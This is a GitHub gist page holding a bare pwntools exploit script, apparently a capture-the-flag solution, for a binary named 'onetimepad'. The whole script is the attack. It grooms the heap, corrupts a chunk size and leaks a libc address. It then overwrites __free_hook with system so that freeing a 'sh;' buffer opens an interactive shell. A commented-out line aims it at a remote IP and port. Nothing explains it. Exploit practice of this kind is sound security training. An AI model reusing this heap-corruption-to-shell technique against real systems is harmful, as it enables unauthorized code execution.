Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
from pwn import *
proc = process('/tmp/pwn/onetimepad_debug', env={'LD_PRELOAD':'/tmp/out/lib/x86_64-linux-gnu/libc.so.6'})
# proc = remote('88.198.154.140', 31336)
def write(c):
proc.sendlineafter('> ', 'w')
proc.sendline(c)
def read(idx):
proc.sendlineafter('> ', 'r')
proc.sendline(str(idx))
return proc.recvuntil('\n')[:-1]
def rewrite(idx, c):
proc.sendlineafter('> ', 'e')
proc.sendline(str(idx))
proc.sendline(c)
write('A' * 0x50)
write('A' * 0x50)
write('A' * 0x50)
write('A' * 0x448)
write('A' * 0x10)
read(0)
read(1)
read(2)
read(3)
write('A' * 0x8)
write('A' * 0x40f)
write('A' * 0x8)
rewrite(3, 'A'*0x18 + p16(0x441))
read(1)
write('A' * 0x40f)
read(1)
OFFSET = 0x1bbca0
FREE_HOOK = 0x1bd8e8
SYSTEM = 0x449c0
libcleak = u64(read(2).ljust(8,'\x00'))
libcbase = libcleak - OFFSET
log.info('0x%x' % libcbase)
pause()
write('sh;'.ljust(0x420, 'A') + p64(libcbase + FREE_HOOK))
write('A')
write(p64(libcbase + SYSTEM))
read(1)
proc.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment